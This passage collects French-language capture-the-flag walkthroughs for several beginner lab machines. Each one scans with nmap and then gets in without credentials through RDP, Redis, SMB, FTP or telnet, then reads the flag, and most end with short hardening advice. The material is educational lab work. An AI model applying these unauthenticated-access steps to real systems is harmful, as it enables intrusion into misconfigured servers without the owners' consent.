• /cert:ignore : Ignore les alertes de certificat
• /u:Administrator : On tente le compte admin

Au prompt Domain/Password, on appuie sur Entrée (vide).

Une fenêtre s'ouvre et affiche directement le bureau Windows de la machine cible. Pas besoin de mot de passe !

Récupération du flag​

Un fichier flag.txt est visible sur le bureau.

La machine est pwned !

Post-Exploitation​

Conseil de sécurité : toujours exiger une authentification forte (NLA) et des mots de passe complexes pour le RDP. Ne jamais laisser Administrator sans mot de passe.

Vidéo Walkthrough​

Reconnaissance​

Découverte d'hôte​

┌─[user@parrot]─[~]
└──╼ $ping 10.129.2.212

64 bytes from 10.129.2.212: icmp_seq=1 ttl=63 time=14.5 ms

Énumération des services​

Le scan classique ne trouve rien sur les 1000 ports par défaut — on scanne tous les ports.

┌─[user@parrot]─[~]
└──╼ $nmap -p- -sV 10.129.2.212

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7

Port 6379 : c'est Redis (version 5.0.7). Redis est un système de stockage clé-valeur en mémoire, souvent utilisé comme base de données ultra-rapide ou cache.

Pré-Exploitation​

Evaluation de vulnérabilité​

sudo apt install redis-tools

┌─[user@parrot]─[~]
└──╼ $redis-cli -h 10.129.2.212

10.129.2.212:6379>

On a un prompt sans aucune authentification. Faille critique de configuration.

Exploitation​

Exploration de la base de données​

10.129.2.212:6379> info

# Keyspace
db0:keys=4,expires=0,avg_ttl=0

La base db0 contient 4 clés. On liste toutes les clés.

10.129.2.212:6379> select 0
OK

10.129.2.212:6379> keys *
1) "temp"
2) "numb"
3) "flag"
4) "stor"

Une clé nommée flag — on récupère sa valeur.

10.129.2.212:6379> get flag

"03e{...}3eb"

La machine est pwned !

Post-Exploitation​

Redis est extrêmement puissant mais ne possède pas de couche de sécurité robuste par défaut s'il est exposé sur le réseau sans mot de passe. Toujours vérifier que vos bases de données ne sont pas accessibles publiquement sans authentification.

Script bash de récupération automatique : MohamedOutougane/Redeemer_Automated

Vidéo Walkthrough​

Reconaissance (Information gathering)​

Découverte d'hôte (Asset discovery)​

Comme d'hab, la première étape est de vérifier que la machine répond avec la commande ping suivi de l'IP de la cible. On vérifie juste qu'on a bien une connexion stable.

┌─[user@parrot]─[~]
└──╼ $ping 10.129.63.29

PING 10.129.63.29 (10.129.63.29) 56(84) bytes of data.
64 bytes from 10.129.63.29: icmp_seq=1 ttl=127 time=14.4 ms
64 bytes from 10.129.63.29: icmp_seq=2 ttl=127 time=13.5 ms
64 bytes from 10.129.63.29: icmp_seq=3 ttl=127 time=15.0 ms
64 bytes from 10.129.63.29: icmp_seq=4 ttl=127 time=137 ms
^C
--- 10.129.63.29 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3012ms
rtt min/avg/max/mdev = 13.495/44.877/136.630/52.976 ms

La machine répond (le TTL de 127 confirme souvent qu'on est face à du Windows), on peut passer à la suite.

Énumération des services (Service enumeration)​

On lance un scan des ports pour voir ce qui tourne sur la bête. nmap est notre meilleur pote pour ça. J'utilise le flag -sV pour essayer de choper les versions des services.

┌─[user@parrot]─[~]
└──╼ $nmap -sV 10.129.63.29

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-01 21:21 UTC
Nmap scan report for 10.129.63.29
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.81 seconds

On repère 3 ports ouverts : le 135, le 139 et surtout le 445. Le service sur le 445 est microsoft-ds, plus connu sous le nom de SMB (Server Message Block). C'est le protocole standard pour le partage de fichiers et d'imprimantes sur un réseau local. S'il est mal configuré, il permet parfois de s'y connecter sans mot de passe. C'est exactement ce qu'on va tester.

Pré-Exploitation​

Evaluation de vulnérabilité (Vulnerability Assessment)​

Pour interagir avec SMB depuis notre terminal Linux, on utilise l'outil smbclient. L'objectif est d'abord de lister les dossiers partagés (shares) disponibles sur la machine. On utilise le flag -L (List).

┌─[✗]─[user@parrot]─[~]
└──╼ $smbclient -L 10.129.63.29

Password for [WORKGROUP\user]:

À cette étape, on nous demande un mot de passe. On appuie juste sur Entrée sans rien écrire pour tenter une connexion anonyme.

Password for [WORKGROUP\user]:

 Sharename       Type      Comment
 ---------       ----      -------
 ADMIN$          Disk      Remote Admin
 C$              Disk      Default share
 IPC$            IPC       Remote IPC
 WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.63.29 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Bingo ! On voit 4 partages :

• ADMIN$ et C$ (souvent réservés aux admins)
• IPC$
• WorkShares (celui-ci a l'air custom, c'est suspect 👀)

Exploitation​

Accès initial​

Maintenant, on va essayer de se connecter à chacun de ces dossiers pour voir ce qu'on peut gratter. On commence par les classiques ADMIN$ et C$.

┌─[user@parrot]─[~]
└──╼ $smbclient \\\\10.129.63.29\\ADMIN$

Password for [WORKGROUP\user]:
tree connect failed: NT_STATUS_ACCESS_DENIED

┌─[✗]─[user@parrot]─[~]
└──╼ $smbclient \\\\10.129.63.29\\C$

Password for [WORKGROUP\user]:
tree connect failed: NT_STATUS_ACCESS_DENIED

Comme prévu, "Access Denied". On n'a pas les droits. On tente IPC$ :

┌─[✗]─[user@parrot]─[~]
└──╼ $smbclient \\\\10.129.63.29\\IPC$

Password for [WORKGROUP\user]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*

La connexion passe, mais il n'y a rien à voir. Il nous reste notre meilleur espoir, WorkShares.

┌─[user@parrot]─[~]
└──╼ $smbclient \\\\10.129.63.29\\WorkShares

Password for [WORKGROUP\user]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 08:22:01 2021
  ..                                  D        0  Mon Mar 29 08:22:01 2021
  Amy.J                               D        0  Mon Mar 29 09:08:24 2021
  James.P                             D        0  Thu Jun  3 08:38:03 2021

  5114111 blocks of size 4096. 1749358 blocks available

Jackpot ! On est connecté et la commande ls nous révèle deux dossiers utilisateurs : Amy.J et James.P. Il est temps de fouiller (on loot on loot lol).

Récupération des données​

On va explorer le dossier d'Amy en premier.

smb: \> cd Amy.J
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 09:08:24 2021
  ..                                  D        0  Mon Mar 29 09:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 11:00:37 2021

  5114111 blocks of size 4096. 1749350 blocks available

Il y a un fichier worknotes.txt. On le télécharge sur notre machine avec la commande get.

smb: \Amy.J\> get worknotes.txt

getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)

Ensuite, on check chez James.

smb: \Amy.J\> cd ../James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 08:38:03 2021
  ..                                  D        0  Thu Jun  3 08:38:03 2021
  flag.txt                            A       32  Mon Mar 29 09:26:57 2021

  5114111 blocks of size 4096. 1752993 blocks available

Et voilà le trésor ! Le fichier flag.txt est là. On le télécharge aussi.

smb: \James.P\> get flag.txt

getting file \James.P\flag.txt of size 32 as flag.txt (0.5 KiloBytes/sec) (average 0.9 KiloBytes/sec)

On peut quitter proprement avec exit.

smb: \> exit

Post-Exploitation​

De retour sur notre machine locale, on vérifie notre butin.

┌─[user@parrot]─[~]
└──╼ $ls

Desktop    Downloads  Pictures  Templates  flag.txt
Documents  Music      Public    Videos     worknotes.txt

On jette un œil aux notes d'Amy pour la forme :

┌─[user@parrot]─[~]
└──╼ $cat worknotes.txt

- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing

C'est juste une To-Do list (ironique vu qu'elle n'a pas sécurisé le SMB…), ça ne nous sert pas ici. Mais gardez le réflexe : sur des machines plus complexes, c'est souvent ce genre de fichier qui vaut de l'or pour repérer le prochain vecteur d'attaque ou trouver la prochaine vulnérabilité à exploiter.

Le moment de vérité, on affiche le flag :

┌─[user@parrot]─[~]
└──╼ $cat flag.txt
 
5f6{...}664

La machine est pwned !

Pour aller plus loin​

Script automatisé​

J'ai fait un script bash qui permet de récuperer automatiquement le flag de la box Dancing : MohamedOutougane/Dancing_Automated

Vidéo Walkthrough​

Reconnaissance (Information gathering)​

Découverte d'hôte (Asset discovery)​

La première étape est de vérifier que la machine répond avec la commande ping.

┌─[user@parrot]─[~]
└──╼ $ping 10.129.130.0

PING 10.129.130.0 (10.129.130.0) 56(84) bytes of data.
64 bytes from 10.129.130.0: icmp_seq=1 ttl=63 time=16.1 ms
64 bytes from 10.129.130.0: icmp_seq=2 ttl=63 time=15.5 ms
^C

Énumération des services​

┌─[user@parrot]─[~]
└──╼ $nmap -sV 10.129.130.0

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Port 21/tcp ouvert. Le service FTP (vsftpd 3.0.3) est non chiffré. Sur des machines mal configurées, il peut accepter des connexions anonymes.

Pré-exploitation​

Evaluation de vulnérabilité​

On tente une connexion interactive via ftp 10.129.130.0.

┌─[user@parrot]─[~]
└──╼ $ftp 10.129.130.0

Connected to 10.129.130.0.
220 (vsFTPd 3.0.3)
Name (10.129.130.0:user):

Le service présente une invite d'authentification. On va tenter le compte anonymous avec un mot de passe vide.

Exploitation​

Accès initial​

Name (10.129.130.0:user): anonymous
331 Please specify the password.
Password:

230 Login successful.
ftp> ls

-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt

Connexion validée ! On télécharge le flag.

ftp> get flag.txt
ftp> exit

Post-Exploitation​

┌─[user@parrot]─[~]
└──╼ $cat flag.txt

035{...hidden..}815

La machine est pwned !

Pour aller plus loin​

Script Python de récupération automatique du flag : MohamedOutougane/Fawn_Automated

Vidéo Walkthrough​

Reconnaissance (Information gathering)​

Découverte d'hôte (Asset discovery)​

La première étape est de vérifier que la machine répond avec la commande ping suivi de l'IP de la cible. Cela permet de confirmer la connectivité réseau.

┌──(kali㉿kali)-[~]
└─$ ping 99.99.99.99

PING 99.99.99.99 (99.99.99.99) 56(84) bytes of data.
64 bytes from 99.99.99.99: icmp_seq=1 ttl=63 time=12.3 ms
64 bytes from 99.99.99.99: icmp_seq=2 ttl=63 time=12.5 ms
64 bytes from 99.99.99.99: icmp_seq=3 ttl=63 time=12.9 ms
64 bytes from 99.99.99.99: icmp_seq=4 ttl=63 time=156 ms
^C
--- 99.99.99.99 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 12.332/48.529/156.335/62.241 ms

Quand on obtient des réponses, on peut interrompre la commande avec CTRL+C. Les 4 paquets reçus confirment que la cible est joignable.

Énumération des services​

On va scanner les ports pour connaître les services accessibles et leurs versions. nmap est l'outil standard pour ça. J'utilise le flag -sV pour la détection de version.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 99.99.99.99

Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-01 15:47 EDT
Nmap scan report for 99.99.99.99
Host is up (0.067s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 11.57 seconds

On voit qu'un seul port est ouvert, le port 23/tcp. Le service est telnet — un service d'administration à distance non chiffré. Sur des machines mal configurées, il peut accepter des connexions sans mot de passe ou avec des identifiants par défaut.

Pré-Exploitation​

Evaluation de vulnérabilités​

Avant d'exploiter quoi que ce soit, on vérifie si une connexion interactive est possible. On tente telnet 99.99.99.99 pour voir l'écran d'accueil et un prompt de login.

──(kali㉿kali)-[~]
└─$ telnet 99.99.99.99

Trying 99.99.99.99...
Connected to 99.99.99.99.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login:

Le service demande un login — on va essayer des identifiants courants ou des comptes sans mot de passe.

Exploitation​

Accès initial​

On teste des comptes usuels sans mot de passe (admin, root, etc.).

──(kali㉿kali)-[~]
└─$ telnet 99.99.99.99

Meow login: admin
Password:

Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

Sur Meow, la connexion admin échoue mais root passe sans mot de passe — mauvaise configuration flagrante.

Post-Exploitation​

Après connexion en tant que root, on vérifie les infos système avec uname -a et whoami, puis on liste les fichiers.

root@Meow:~# ls
flag.txt  snap

root@Meow:~# cat flag.txt

b40{...hidden..}c19

La machine est pwned !

Pour aller plus loin​

Script automatisé​

J'ai fait un script Python qui permet de craquer automatiquement la box Meow : MohamedOutougane/Meow_Automated